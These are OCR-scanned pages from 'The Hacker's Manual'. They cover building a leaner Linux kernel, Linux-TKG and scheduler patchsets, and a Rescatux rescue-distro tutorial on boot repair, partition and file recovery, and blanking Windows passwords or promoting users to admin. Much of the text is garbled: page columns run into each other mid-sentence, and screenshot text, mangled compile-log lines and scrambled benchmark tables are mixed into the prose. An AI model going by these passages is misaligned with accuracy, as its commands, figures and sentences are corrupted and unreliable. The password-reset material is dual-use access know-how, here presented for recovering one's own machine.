<M> SCSI Enclosure Support To get some idea about which firmware has been
[*] Verbose SCSI error reporting (kernel size += 36K)
loaded on your system, run journalctl -b to bring up the
[*] SCSI logging facility
[*] Asynchronous SCSI scanning journal for the current boot. Press / to instigate a search,
SCSI Transports --->
[*] SCSI low-level drivers and search for firmware. On our XPS we found the
following lines (and then some irrelevant matches to do
with UEFI keys):

Colonel Kurtz advises...


Space (at least the space taken up by the driver at around 20MB. Nouveau, the FOSS
kernel) on modern hardware shouldn’t be a driver for Nvidia cards is by comparison a tiny
concern. The compressed kernel image / 3.4MB. So axing whichever of these you don't
boot/vmlinuz on our Pop!_OS system need is a start to slimming down your kernel.
occupies a mere 11MB. And the Drivers on Linux are small, you might have
accompanying modules, found in /lib/ noticed. Even AMDGPU is tiny compared to
modules/5.15.../ occupies around 425MB. the equivalent massive (-450MB) download
Any other Ubuntu-based system will have on Windows. The difference is that very little
similar statistics (unless you have been of that Windows package is 'driver'. Most of
tweaking things already). If half a gigabyte is it is firmware, oh and shiny but useless (if not
important to you (which it might be on old outright annoying) gameware applications. So
hardware) then recompiling a leaner kernel in reality removing drivers one by one is a
(with only the required drivers) would be one fairly thankless exercise (the kernel
way to achieve that. Naturally, that comes configuration interface doesn't make this > The kernel sources directory gets big once
with the downside that if you ever acquire easy either). It's unlikely to liberate more than you start compiling. Here the Intel graphics
different hardware, it won't work with the a couple of hundred megabytes. Of course, bits are occupying half a gigabyte.
slimline kernel. there's plenty else to remove too. but again
Further investigating in the modules/ each component is small and sometimes
directory reveals that the network, media and much more critical than it sounds. So blindly
GPU device drivers together occupy the most removing swathes of them is likely going to to
space (165MB). If you examine further you’ll end you up with a broken, (but undeniably
see that AMDGPU is the largest graphics leaner) kernel.

36 | The Hacker's Manual


Build the Kernel
8Fet
[dim] Finished loading DMC firmware i915/kbl_dmc_
txf04xf-SUnd«rd-PC-Q3$-ICHS-a
verl_04.bin (vl.4)/
<- C O fl *rchUnux.OQ/title/Mo<lp'o 0 O 0 = lxfOtxf-SUnd*r<J-PC-<}J$-l... IxfQlxf-SUndard-PC-QSS-l.
athlOk_pci 0000:3a:00.0: firmware ver WLAN.RM.4.4.1-
00157-QCARMSWPZ-l/
■ Comparisons using kernel version 5.13.1. where a Kemel/Traditional compilation is
made with the default Arch configuration.
CC
CC
CC
(MJ
(H)
(MJ
drtvers/htd/surface-htd/surface_htd_core.o
drtvers/crypto/vtrtto/vtrtto.cfypto.core.o
drtvers/crypto/qat/oat_coMon/adf_gen2_hw_d4
CC [M] drtvers/htd/surface-htd/surface_htd.o

So our Intel graphics need to run DMC (nice) firmware A Machine • of


Compiler , _ „ „ _ ,
Total Kernel
Conpllatlon Compilation
CC
LO
(MJ
(mJ
drtvers/stagtng/nedta/atontsp/pcl/atontsp.fi
drtvers/crypto/vtrtlo/vtrtlo_crypto.o
CPU threads localmodconfig Modules _ CC [MJ drlvers/crypto/tnstde-secure/safexcel.o
Time Time CC [MJ drtver$/crypto/qat/qat_como«/adf_gen4_bw_di
and our wireless chip needs something too. The latter CC [M] drtv*r$/Md/surface-htd/surface_kM.o
CC (MJ drtver$/crypto/qat/qat_coMon/qat_crypto.o
5950X @ 3? , No S44? Sm SSs
doesn't explicitly tell us which firmware file it needs, but if 4.55 GHz
11.1.0
CC
CC
[H] drtver$/$tagtng/nedta/atofltsp/pcl/atont$p_f(
drtvers/htd/htd-core.o
CC [m] drtvers/crypto/qat/qat_comon/qat_algs.o
we look at the output of Ispci we can obtain a model Ryzen CC (MJ drtvers/crypto/tnstde-$ecure/safexcel_rtng.<
5950X© 32 111 0 Yes 227 Im 32s 57$ CC (MJ drtvers/stagtnq/nedta/atontsp/pct/atontsp_t<
CC drtvers/htd/htd-tnput.o
number (QCA6174). And it turns out there's a /lib/ 4.55 GHz CC (MJ drtvers/crypto/tnslde-$ecure/safexcel_ctph«i
CC [M] drtver$/crypto/qat/qat_coMAwi/qat_asyM_algs
firmware/athl0k/QCA6174 directory, so that’s probably 5950X© 32 1^’1 No 5442 9m 5s Im 13s CC
CC
[MJ
[n]
drtvers/crypto/qat/qat_comon/qat_uclo.o
drtver$/crypto/tn$tde $ecure/$afexcel_ha$h.(
4 55 GHz CC drtvers/htd/htd-qutrks.o
what we want. Ry2*n
CC
CC
(MJ drlvers/stagtr>g/nedta/atoMsp/pcl/atoMsp_s«
drtvers/htd/htd-debug.o
5950X @ 32 1^1 Yes 227 2m 13$ Im 13$
CC (MJ drtvers/crypto/qat/qat_coMon/qat_hal.o
Again, unless you're seriously strained for space it’s 4.55 GHz ID (mJ drivers/crypto/in$tde-secure/crypto_$afexce1
CC (mJ drlvers/crypto/aMloglc/antogtc-gxl-core.o
not really worth picking your firmware directory apart Note: These results do not prove that GCC is faster than Clang at building the kernel.
CC
CC
[M] drtver$/$tagtng/Medta/atoat$p/pct/ataMt$p_t|
drtvers/htd/htdraM.o
The GCC version used in these benchmarks is self built and optimded. CC (m] drtvers/crypto/anlogtc/anlogtc-gxl-ctpher.o
like this. At least it wasn’t on our XPS. But we do CC
CC (mJ
drlvers/htd/htd-genertc.o
drtvers/stagtng/nedta/atOMlsp/pct/atontspv^
The main results of the benchmark is that 80% of the build time of j 'full* kernel is CC (MJ drtvers/crypto/qat/qat_coMon/adf.transport.
maintain a growing collection of old hardware, including spent on modules. Given that only a fraction of those modules are reeded by any

the undying Eee PC from 2007. With only 2GB of SSD,


there can be no wasted bytes. Indeed, such old hardware
doesn't need any firmware at all. Naturally, we've make-kpkg this time, going instead back to first > Prolific Arch
slimmed down the kernel to next to nothing as well. If principles. So this approach should work on other distros contributor
you’re making a kernel that’s tailored for particular too. Once the image builds we need to follow the Graysky has
released some
hardware, then a common technique is to build any instructions in the Colonel Kurtz Advises box. Let's
benchmarks for
required drivers into the kernel image as opposed to assume you’ve done that, and installed your modules
his modprobed-
building modules. The kernel configuration interface and kernel, run depmod and the like.
db helper utilty.
even has its own mechanism for selecting modules Those steps should build a corresponding initrd
based on what’s currently loaded. (initial ramdisk/ramfs image) and put it in /boot where
To use this, make sure any hardware you’d like the it can be found by GRUB. If you’re not using GRUB, for
new kernel to support is plugged in and working. example you’re on PopLOS which uses systemd-boot,
$ make localmodconfig then extra work may be required to get the bootloader to
This generates a configuration based on the current
kernel configuration together with any currently loaded
modules. In general, this results in a kernel that still has a
Give modules the heave-ho
number of extraneous modules, but if you have the “If you’d rather have those
patience to iteratively compile, test and remove then
eventually you'll find your way to kernel bliss. It car be drivers compiled into the
taxing to manually load every possible driver, and in
some cases it’s hard to resolve hardware names to kernel, as opposed to as
module names. It’s particularly frustrating when you
miss a key module (yes, you do need SCSI disk support
modules, you can use the
believe it or not) and have to rebuild the whole thing. command localyesconfig
One tool that can help you with this is Modprobed-db
(see https:Z/github.com/graysky2/modprobed-db), instead”
which keeps a database of all the modules ever loaded
on the system. This increases the chances that hardware pick up the new kernel. We were pleasantly surprised
you haven't plugged into the system for ages will still this all worked almost without a hitch on our PopLOS
work with the new kernel. laptop. But do study the documentation for the
kernelstub utility before going in with all guns blazing.
Where to compile your drivers? Systemd-boot requires the whole kernel to live on the EFI
If you’d rather have those drivers compiled into the partition, and you don’t want to accidentally fill this up.
kernel, as opposed to as modules, you can use the As you become more involved with building kernels,
command localyesconfig instead. If a previous you’ll grow more and more familiar with the
configuration from an older kernel exists, you’ll be asked configuration interface and where particular options
about new drivers that have been added to the new hide. You’ll also find that, contrary to widely misheld
sources. Usually it’s okay to accept the defaults he-e. belief, Linux does in fact support a huge amount of
Once the new configuration is written out we can use a hardware. From HAM radio to steering wheel controllers
handy script to see any differences, like so: (new in 5.15) to ISDN modems (remember them?).
$ scripts/diffconfig config.old config There’s also a good amount of weirdness. If you nosey
You should notice a lot of lines in the new file (prefixed deep enough into the kernel sources themselves then
by +) are now set to negative. Let’s try building our diet­ you can find plenty of interesting stuff. The arch/x86/
sized kernel with a simple purgatory subdirectory for example contains
$ make -j$(nproc) VM-specific code. Specifically, purgatory is an object
The nproc incantation (used on the previous page that sits between running kernels (for example, when a
too) ensures compilation is divided into parallel jobs, one new kernel is about to be loaded). If the process goes
for each CPU core. This might make your machine wrong the kernel hangs with a friendly “I'm in purgatory"
difficult to work with while it’s all building, but will message. It's possible to disable purgatory, but this
certainly speed up compilation time. We're not using won’t absolve you of your sins.

The Hacker's Manual | 37


Distros

Popular patches
Forget trawling through configs - use a pre-rolled patchset to set the rules.
e’re always impressed by Colorado-based can set program 'niceness’ manually using the renice

W System76 and its contributions to Linux.


Not only does it make glorious hardware
and a fine desktop environment, it's also put in aothers
effort tweaking behind-the-scenes kernel settings. This
command. Howeve-, this needs to be set every time a
process is spawned, so the advantage of Ananicy (and
lot of like it) is that multiple nicenesses (niceties?) can
be set automatically. All the user needs to do is start a
work has culminated in the System76 Scheduler systemd service.
service, which tweaks the kernel’s CFS (Completely
Fair Scheduler) settings for lower latency when on AC Interpreting levels of niceness
power. You don’t even have to be using Pop!_OS to take Technically, niceness is distinct from priority, in the sense
advantage of it, but if you are it’ll automatically that processes have a value for both. Priority can take any
prioritise foreground applications, as well as common value from rt (realtime) to -51 (very high priority) to 20
desktop processes such as Gnome Shell and Kwin. (normal priority). By default, user processes (and most
system processes) are given a priority of 20, important
system processes have a priority of 0, and really
Processes playing nice important ones have even lower. If two processes
competing for CPU :ime both have the same priority, then
“If two processes competing the process with the lowest niceness takes precedence.
The Pulseaudio daemon, for example, by default runs as a
for CPU time both have the user process with a nice level of -11, so that other user

same priority, then the process processes don't make for choppy audio output.
One of the earliest and most popular patchsets
with the lowest niceness takes for the kernel is Con Kolivas’ “CK” effort. Starting out
as a set of tweaks to improve desktop performance,
precedence.” it evolved to include a series of new CPU schedulers,
culminating in BPS (the middle letter of which stands for
something rude) in 2009. Kolivas has in the past voiced
Garuda Linux is making a lot of headlines lately. The concerns about kernel developers’ lack of interest in the
slick, eye-candy heavy. Arch-based distro includes a desktop. But with BPS (and much of his scheduler work)
couple of daemons that ought to improve the intention was never to get it mainlined. It’s not
responsiveness. First there's Ananicy (ANother Auto general purpose enough for the kernel, and the kernel
NICe daemon), which automatically renices (gives has only one scheduler anyway (the Completely Fair
greater affinity) processes. The idea here (as with any Scheduler, CPS'). BFS has since been retired in favour of
scheduling tweak) isn’t to magically give you more MuQSS (Multiple Queue Skiplist Scheduler), which was
> Get Garuda’s
speed. Rather, it’s concerned with tweaking priorities so introduced in 2016.
kernel goodness
that heavy tasks (like compilation or indexing) don’t If you want to try out MuQSS, you can grab the
without the icon
garishness, with interfere with things happening in the foreground. patches directly and apply them to a vanilla source tree
Linux-TKG Nicing is a feature of the Linux kernel itself, and you (see https:Z<github.com/ckolivas/linux for
instructions). Alternatively. MuQSS has been included in
O Firefox web Browser •
various custom kernels, namely Liquorix (https://
Welcome | Carvd* Lino x Ixf^lxf-SUndard
liquorix.net) and Linux-TKG. The latter includes a choice
Q OS h«ps://wiki 2orudalinux.org erb r oni. lxf^xf-SUndardPC-935-l... txf@>lxf-SUn

(MJ drtvers/tnftntband/hw/hftl/exp_r of several schedulers, as well as some patches from


Garuda Linux wiki Q ® 9 (HJ drtvers/tnftntband/hw/bnxt_re/qp
["] drtvers/tto/tnu/tnv_tcn426M/tn\ Intel's performance-focused Clear Linux. Linux-TKG also
GarudaLinux Garuda is loaded with amazing tools and supported by a great community. ["] drtvers/ROSt/conftgfs.o
system
Tool*
(*1 drtvers/tto/tRu/tnv_tcn426e«/tn\
drtvers/tto/tnu/tnv_tcn4260e/tn\
enables you to compile the whole kernel with CPU-
requirements ["]
drtvers/tto/tRu/tnvmtCR426ee/tn*
Garuda Linur
(«]
[«) drtvers/tto/tnu/tnv_npu6dS0/tnv_ native optimisations. You might have noticed the vanilla
(«] drtvers/nost/nost usb.o
in comparison [H] drtvers/tnftntband/hw/hftl/ftle_ kernel has some CPU options (under the Processor
toother [N] drtvers/tnftntband/hw/bnxt_re/qt
popular [HJ drtvers/tnftntband/hw/bnxt_re/qp Type and Features) but these only target a particular
Garuda Gainer (HJ drtvers/Ug/tnu/tnY_npu6050/tnv_
distributions Setting* Mjnjjer drtvers/ROSt/nost_cdev.o
[«]
[«] drtver$/tnftntband/hw/bnxt_re/qp
family, rather than a given microarchitecture such as
E0 [H]
[N]
[H]
drtvers/ROSt/r»ost_snd.o
drtvers/tto/tnu/tnv_npu6050/tnv_
drtvers/tnftntband/hw/hftl/ftrnv
Zen 2 for modern Ryzen processors.
(Hl drtvers/nost/Host_core.o Linux-TKG (see https://github.com/Frogging-
drtvers/butlt-tn.a
drtvers/Uo/tnu/tnv_Rpu6050/tnv_
- Installation ["]
("I drtvers/tnftntband/hw/hftl/tntt. Family/linux-tkg) is included in Garuda Linux, but you
’ First steps [HI drtvers/tto/tnu/tnv_npu6050/tnv_
can try it out on any Arch-based distro. or any distro
► Customization
► Cheat sheet* /
£ [H]
[H]
(«]
drtvers/tnftntband/hw/bnxt_re/h*
drtvers/tto/tRu/tnv_Rpu6050/tnv_
drtvers/tnftntband/hw/hftl/tntr. with Arch's Pacman package manager installed. In
[H] drtvers/tnftntband/hw/bnxt_re/br
keybindings drtvers/tnftntband/hw/hftl/towat
[H]
(Ml drtvers/tto/tRu/tnv_Rpu6BSe/tnv_ theory it’ll work anywhere, but this isn't officially
» Gaming on drtvers/tnftntband/hw/hftl/tpott
(HJ
["] drtvers/tnftntband/hw/hftl/tpott sanctioned. Let’s try it. You’ll need to install Git and then
[H] drtvers/tto/tnu/tnv_npu60S0/tnv_
fetch the sources:

38 | The Hacker’s Manual


Build the Kernel
tools don’t ask to be included in the Linux titlage, and if
they did we would probably mock them.
If you choose Clang (see box, below), you can choose
jonni^pop-os: /mnt/heavy/tinux-S.1S.1S jonni<® pop-os: -
to enable Link Time Optimisations, but this will use a lot
of memory and take a long time.

Researching Clang
Using Clang requires (at least) the dang, llvm and lid
packages to be installed. And if you're on Ubuntu 20.04
you'll have to work around the older (version 10 series) in
the repos. DuckDuckGo is your friend here...
You’ll be asked several more questions, and some of
them have defaults which you should probably stick to at
first. Kernel Timer frequency has been the subject of
> Any excuse to feature a Pop!_OS background. They also some debate over the years, and TKG's default of 500Hz
make bespoke scheduler tweaks now seems to fit sensibly in the middle of the generic kernel
default of 250Hz, and the 1,000Hz setting currently used
$ sudo apt install git by some low-latency kernels. Finally you’ll be asked if you
$ git clone https://github.com/Frogging-Family/linux-tkg. want to run nconfig (or any of the other kernel
git configuration interfaces) for any final tweaks.
$ cd linux-tkg Once again now is a good time to make a cup of tea,
There’s a helpful installation script which we'll run in as kernel sources have to be cloned, patched and
a moment, but do read the documentation before doing configured. Any kernels generated this way must be
so. There’s also a config file customization.cfg that can removed manually, but the script can help with that. In
influence the script’s behaviour. Like make-kpkgthe general, any custom kernel you build as a DEB package
script will build DEB (or RPM if you’re using Fedora) should be easy to remove, but always keep an eye on
packages which can be installed like any other software. your /boot directory for ancient artefacts. We’d dearly
See how you get on with: love to cover more kernel patches, in particular Xanmod,
$ ,/install.sh install but it looks like we'll have to leave these explorations to
You'll be asked which distro you're using (there's a you. Do let us know how you get on!
generic option, but in general if you choose something
close to your distro it should work). Next you'll be asked
which kernel version you want to install. They’re listed Q Q clang orq

newest first, from the bleeding edge-RCs to the strong


lxf®4xf-SUnd*rd-PC-QJS-ICH»-2OO*-/llnux-tkq/l
and stable 5.4 series. We figured we'd go for a 5.16
version, because that seemed newer and shinier than
clang 3.5 is here... lxfjNxf-SUnd*rd-PC-QJS-ICH»-... (xf©>lxf-SUnd*rd-PC-Q JS-ICH9-...

IxfSlxMtandard - PC-Q35 - KM - x-tksAi


what we were currently running. You’ll then be offered a [sudo] password for Ixf:
... featuring C++14 support! Sorry, try again.
choice of CPU scheduler (we chose Project C/BMQ) [sudo] password for Ixf:
Reading package lists... Done
and given a choice of compiler. </> Get Started Building dependency tree
Reading state information... Done
The following additional packages will be installed:
■a
Downloads clang-10 llbclang-common-10-dev libclang-cpplO libclangl-1
Tools of the Linux trade ® C+*14/C++ly Status UbompS*10 llvm-10 llvn-10-dev Uvn-10-runtime Uvn-10-too
Suggested packages:
clang-10-doc libonp-10-doc Uvn* 10* doc
When Linux was announced in 1991 Linus noted that he
w Report a Bug The following NEW packages will be installed
clang clang-10 libclang-common-10-dev libclang-cpplO libel
had ported GNU Bash and GCCto work with it. He also libompS-10 Uvn-10 llvn-10-dev Uvn-10-runtime llvn-10-too
Get Involved
0 to upgrade, 12 to newly install, 0 to remove and S not to
noted these tools weren’t part of Linux proper, so as Need to get 70.0 MB of archives.
Planet Clang
After this operation, 439 MB of additional disk space will b
'distributions' started bundling GNU tools with the Linux Do you want to continue? [Y/n] |

Kernel, the GNU/Linux conjunction was born. Today’s


distributions still bundle lots of GNU tools (bash, emacs, > If you use Ubuntu 20.04 you’ll have to do some Apt magick to make
gcc), but also lots of other non-GNU tools. Those other Clang 3.5 work.

The Clang-ers
Some distros, such as Alpine and Android, language in which most of the kernel is Furthermore, a binary compiled with Clang
include very few GNU components (for written) as well as the GNU C extensions. can be investigated with advanced static and
example, muslibc and Bionic are used, There are technical reasons for using Clang dynamic analysis tools from the LLVM suite.
respectively, instead of the GNU C library). These can help find bugs. And yes. this means
as opposed to GCC. First, it makes
Most distros are still using GCC to compile compilation for different platforms easy. A that using Clangto compile the kernel can
their kernels, but for many years now it has result in a performance increase. As well as
binary compiled with Clang (m what's called
been possible to use the LLVM/Clang this, since Linux 5.12 (February 2021) the
the LLVM Intermediate Representation) can
compiler instead. Android and ChromeOS do kernel has supported LTO (link-time
target, after being processed by the
this, and so does OpenMandriva. LLVM (the optimisations) with Clang.
appropriate LLVM backend, multiple
Low Level Virtual Machine) is a toolchain This exercise enables the kernel to be
architectures. Currently, building the kernel is
based around C++ objects, and Clang is a optimised as a whole, instead of in the context
only supported for ARM and x86 targets, but
frontend to LLVM that supports C (the of individual source files.
others (MIPS. RISC-V, PowerPC) are available.

The Hacker's Manual | 39


Distros

Rescatux:
Repair & rescue
A one-stop lifebuoy to rescue your computer no matter if it’s
running Linux or Windows.
o many things can mess up your computer. A careless

S keypress can delete a file, rewrite the bootloader, mess


up the login password or cause other dreaded issues.
If you find yourself in a similar situation, stop panicking and
grab a hold of the Rescatux (http://www.supergrubdisk.
org/rescatux) distribution. The Live CD offers a rich
collection of tools that you can use to address a wide range of
problems in your Linux installation. Moreover Rescatux also
comes in handy if you dual-boot and can fix several common
issues with the Windows partitions as well.
The distribution bundles all the important and useful tools
to fix several issues with non-booting Linux and Windows,
including testdisk, photorec and GParted etc. You can use
Rescatux to restore MBR, repair bootloaders, correct
filesystem errors, fix partition tables and reset passwords on > Rescatux is there to help you recover from disasters, it
both Linux and Windows installs. It also packs in tools to also bundles utilities such as GPGV and shred to secure
Don't blank the rescue data and restore files and can even securely wipe both your system and prevent inadvertent privacy leaks.
password 'or an
Windows and Linux installs.
account that has
encrypted its data There are several rescue-oriented distributions but the minimal LXDE-powered graphical desktop. Here it
using the login Rescatux trumps them all because of its straightforwardness. automatically fires up its custom helper app called Rescapp.
password. Unlike other solutions that only offer a set of tools to fix your The application's interface has improved through the
broken computer. Rescatux employs a custom app that releases, and in its latest version it hosts several buttons
features categorised buttons to handhold you through the divided into various categories, such as Grub, Filesystem,
process of addressing specific problems. Boot and Password. The buttons inside each category have
The distribution is meant to be used as a Live medium, so descriptive labels that help identify their function. When you
transfer the ISO onto an optical disc or a removable USB click a button, it brings up the relevant documentation which
drive. Insert or connect the bootable Rescatux medium in the explains in detail what steps Rescatux will take and what
affected computer and boot from it. Rescatux will take you to information it expects from the user. After you’ve scrolled
through the illustrated documentation and know what to
expect, click the button labelled 'Run!' to launch the
respective utility.

Fsck things first


Although file systems have evolved quite a lot since the last
decade, sometimes all it takes to mess up the hard disk is a
misbehaving program that leaves you no option but to
forcibly restart the computer.
On restart, when your Linux distro detects an unclean
shutdown it automatically launches the fsck filesystem check
utility to verify the consistency of the file system. In many
situations, that should do the trick. But sometimes,
depending on factors such as the age of the disk and the file
system, and the task that was interrupted, an automatic
check wouldn't work.
In such a case your distribution will ask you to run the fsck
> Rescapp has several menus that lead to interfaces for command-line utilities tool manually. Although you can run fockfrom the
that employs a wizard to step through the various stages of the process. maintenance mode with your file system mounted as read-

40 | The Hacker's Manual


Rescatux

One-touch repair
Many issues with the Grub2 bootloader can be computers with the GPT layout. Boot-Repair is the tool also spits out a small URL which you
resolved with the touch of a button thanks to the available under the Expert Tools category in the should note. The URL contains a detailed
Boot-Repairapp. The nifty little app has an Rescapp utility. When you launch it. the app will summary of your disks, partitions along with the
intuitive user interface and can scan and scan your hard disk before displaying you its contents of important Grub 2 files including /
comprehend various kinds of disk layouts and simple interface that's made up of a couple of etc/default/grub and boot/grub/grub.cfg If
partitioning schemes and can sniff out and buttons. Most users can safely follow the tool's the tool hasn't been able to fix your bootloader,
correctly identify operating system installations advice and simply press the Recommended you can share the URL on your distro's forum
inside them. The utility works on both traditional repair button which should fix most broken boards to allow others to understand your disk
computers with MBR as well as the newer UEFI bootloader. After it’s restored your bootloader. layout and offer suggestions.

only, it's best to run feck from a Live CD without mounting the Security Account Manager (SAM) file. Usually it'll only list one
partition. To do this, boot Rescatux and select the File System partition, but if you have multiple Windows flavours, the
Check (Forced Fix) option. This will probe your computer and wizard will display multiple partitions. Select the one which
list all the partitions. Select the one that was spitting errors houses the user whose password you wish to recover. Use TestDiski
and Rescatux will scan and fix any inconsistencies. Rescatux will then backup the registry files before displaying Deeper Search
option toscan each
a list of users it finds on the partition you just selected. Select
cylinder and the
Boot camp the user whose password you wish to reset and Rescatux will superblocks to find
One of the most common issues that plagues Linux users is a wipe its password. You can then restart the computer, reboot missing partitions
botched up boot loader. It really doesn't take much effort to into Windows and login into the user you've just reset and if the default Quick
end up with an unbootable computer. The Master Boot Windows will let you in without prompting for a password. Search option isn't
able to unearth
Record (MBR) is located in a special area at the start of every Similarly, you can use the Promote Windows user to
them.
hard disk and helps keep track of the physical location of all Admin option to do exactly that. This option too will scan and
the partitions and also holds the bootloader. All it takes is a list all Windows partitions that house the SAM file. Select the
wrong key press in fdiskor gpartedcan wipe the MBR. one you’re interested it to view the list of users. Select a user
Rescatux includes several options to regenerate the GRUB from this list and Rescatux will tweak Windows to give it the
boot loader and fix the MBR. There's the Restore Grub option same privileges as an administrator. This mechanism works
which will first scan your computer for all partitions and read for all version of Windows including Windows 10 as well as
their identification information from the /etc/issue file. It'll long as they are secured by a password. However it will not
then display them in a list and ask you to select your main work if you've selected another mechanism to lock your
Linux distribution. Next it probes all the disks connected to account such as a PIN.
the computer and asks you to select the one on which you The newer version of Rescatux include the Easy Windows
wish to install GRUB. If you have multiple disks, the menu will Admin option. This option provides you the ability to take
prompt you to reorder them according to the boot order. back control of a Windows installation by combining multiple > Rescatux is

Once it has all this information, it'll use the grub-install options to first blank the user's password and then promote based on Debian
and includes the
command from the selected Linux distro and generate a new them to the Windows Administrator.
Synaptic package
boot loader and place it in the MBR. If you are using a Debian­ You can also use Rescatux to change passwords on a
manager that
based distribution such as Ubuntu, you can use the option Linux installation and regenerate a broken sudoersfile. Select
you can use
labelled Update GRUB Menus. It takes you through the same the Change Gnu/Linux Password option to allow Rescatux to for installing
wizards as the Restore Grub option but is optimised to help scan your computer for Linux installations. additional
you add Debian-based distributions to the GRUB bootloader. Then select the Linux partition you're interested in to view disaster
The newer releases of the distro also include the Ease a list of users on that particular installation. The root user is » recovery tools
GNU/Linux Boot fix option. It runs a combination of three
options. It starts off by forcing a filesystem check before
running the update grub option and ends with the restore
grub option. On the face of things, you'll still be asked only to
select the main Linux distro and the disk that should hold the
GRUB bootloader. Behind the scenes, this new option uses
the information for the three previously mentioned tasks.

Open sesame
We've all been there. Crafting an obscure password won't do
you any good if you can't remember it. Instead of endless
trying permutations and combinations to hit the jackpot, you
can instead use Rescatux to set yourself a new one without
much effort. The distribution offers password recovery
options for both Linux and Windows installations.
If you've forgotten the password for your Windows
installation, fire up Rescatux and select the Blank Windows
Password option from the Rescapp utility. The distribution
then scans your computer for partitions that contain the

The Hacker's Manual | 41


Distros
shown a list of lost partitions. Depending on the age of your
disk. TestDisk might display several partitions. To figure out
which is the correct partition that you want to recover, look
for the partition label listed at the end of each entry in
[square brackets]. If that doesn’t help you, press P on a
selected partition to see a list of files that TestDisk has found
on that partition. Repeat this with all partitions until you find
the right partition.
When you've found your partition, it's best to copy over
the data just in case TestDisk is unable to restore the
partition. To do so, press P and then use the a key to select all
files. Now press C to copy the files, which will ask you for the
location to save the files. When it's done copying press q to
return to the list of recovered partitions and press Enter to
continue to the next step to restore the selected partition.
TestDisk displays the partition structure again, this time with
> While the » at the top while the normal user accounts that you've created the missing partition accounted for. Now select Write to save
options in the during installation or manually afterwards are listed at the the partition table to the disk, and exit the program. If all goes
Rescatux menu bottom. Unlike resetting Windows password, when you well, when you reboot the computer, your partition will be
will help you select a Linux user, Rescatux gives you the option to define a restored back to where it should be.
fix the boot new password.
loader, in case
You get a similar wizard when you select the Regenerate Restore files
they don’t work
sudoers file option. It too searches for Linux installation and In addition to making unbootable computers boot again,
you can always
then displays a list of users in the selected distribution. Rescatux can also help you recover accidentally deleted files,
fall back on the
However instead of generating a password, this option will since you can't always blame data loss on a hardware failure.
Boot-Repair tool.
add the select user to the /etc/sudoers list which allows The Expert Tools category also includes the Photorec file
them to run apps with superuser permissions. carver utility that can recover files even when it's missing
regular metadata because instead of relying on the filesystem
Reclaim partitions it painstakingly scans the entire hard disk.
Sometimes the issues with your disk are much more severe When you delete a file, it isn't actually zapped into oblivion.
than a botched MBR and a corrupt boot loader. A power Rather the file system just marks it as deleted, and makes the
surge, a failing hard disk or a clumsy operator can all easily space the file occupies available to other files. This means
zap the partition table. TestDisk is the best tool that'll fix that until another app uses that recently freed-up space, the
partition tables and original file is still there, and
can be retrieved by a file
2“sXbXble 0 “Instead of relying on the recovery tool such as

can launch the tool


. I
filesystem
J
it painstakingly
t
Photorec. For this very
reason, it's very important
from under the [] scans the entire hard disk.” that you immediately stop
Expert section in the using the computer as
Rescapp utility. soon as you realise that you have accidentally deleted files in
When launched TestDisk first asks you to create a log order to minimise the interactions with the hard disk.
(which will come in handy for later analysis if the recovery The tool works on all sorts of disks including hard disks
fails) and then displays a list of all the disks attached to the and removable media such as USB disks. In addition to
computer. After you select the disk on which you've lost a reading unbootable disks, Photorec will also recover files from
partition, it’ll ask you to select a partition table type, such as partitions that have been formatted and reinstalled into.
Intel, Mac, Sun and so on. Photorec can sniff the most common image formats and can
Next, you are shown the various recovery options. Select additionally pick out files in various formats including odf, pdf.
the default Analyse option, which reads the partition structure 7zip, zip. tar, rpm, deb, and even virtual disks.
and hunts for lost partitions. It then displays the current Before you fire up Photorec. create a directory where it will
partition structure. Now select the Quick Search option to ask save the recovered files. Once the tool is done, this directory
TestDisk to look for deleted partitions. When it’s done, you're will be populated with lots of weirdly named files in different

When all else fails


While Rescatux will save your day Rescatux is a ferocious scribbler that houses all the logs that you either on the associated tool's
more often than not. it does have and creates a logfile for virtually all can peruse through to figure out forums or in its IRC channel. You
its limitations. If you've run through tasks. The Support section at the the exact reason for a task's failure. can also use the Chat option to
the tutorial and used the relevant top of the Rescapp utility lists the If you're unable to figure out the fire up xchat and log into the
Rescapp option but are still unable various options that comes in solution, you can use the Share log #rescatux IRC channel where
to recover from the failure, it is handy when you’re unable to option to copy the contents of a other users can help direct you to
time to defer to the wisdom of troubleshoot an issue yourself. The selected log file to pastebin. Copy the appropriate outlet to address
the elders. Show log options opens the folder the URL and share it with others your issue.

42 | The Hacker's Manual


Rescatux

OS Uninstaller

D Launch tool D Backup bootloader


Fire up the Rescapp utility and scroll down to the Expert Tools The app displays a list of operating systems and asks you to select
section. Click on the OS Uninstaller button to launch the tool. It'll the one you wish to uninstall. It also suggests you backup the
probe your disks and ask questions such as whether you use a RAID partition table and boot sector. Expand the Advanced options
setup on the disk. It ends when it detects a /boot directory on one of pulldown menu and click the Backup partition tables, bootsectors
the partitions on the disk. and logs option to point to the location for their safekeep.

EJ Uninstall the OS D Update the bootloader


The partition table and boot sector backups come in handy if in case Chances are you have other distributions or operating systems on
removing the OS damages these critical areas that you'll have to fix. this machine besides the one you've just uninstalled. Once you’ve
After backing these up along with any data, proceed with the OS removed an OS, you should make the bootloader aware of the change
uninstallation. The tool will remove all traces of the selected as well. To do this, use the Easy GNU/Linux Boot Fix option to refresh
distribution or OS. the boot loader.

formats. This is because Photorec names these files as it peek inside the destination folder, you'll see several folders
finds them and leaves the sorting to you. named recup_dir.l, recup_dir.2, and so on. The recovered
Also despite the fact that Photorec is a command-line files are saved under these folders. Manually sorting the files
utility, it breaks the process of recovering files into steps, would take forever. You could do some basic sorting from the Instead of wasting
much like a wizard. When you launch the tool, it will display all CLI to better organise the files. You can. for example, use the time sorting
hard disks and connected removable devices including any mv ~/recovered/recup_dir.7*.jpg ~/all-recovered-images to through all the
files recovered by
plugged-in USB drives. To proceed, select the disk with the move all the jpg files from under all the recovered folders into
PhotoRec you can
missing files. In case the disk houses multiple partitions, the all-recovered-images folder. ask the tool to only
Photorec will display all the partitions and lets you select the You can also sort files by their size, “his is very useful look for certain
one that housed the lost files. Next up. the tool needs to know especially when recovering images. In addition to recovering filetypes.
the file system type your files were stored in. It only presents the image itself. Photorec will also recover their thumbnails as
two options. Select the [ext2/ext3] option if the deleted file well which will have the same extension. The command
resided inside a Linux distro. The [Other] option will look for find ~/all-recovered-images/ -name “*.jpg” -size -10k I xargs
files created under FAT/NTFS/HFS+ or any other filesystem. -i mv {} -/thumbnails will move all images less than 10KB in
You’ll then have to decide whether you want to look for size out of the all-recovered-images folder.
deleted files only inside the freed up space or in the whole As you can see. Rescatux is an immensely useful
partition. The last step is to point Photorec to the folder distribution that can help you wiggle out of a tricky situation.
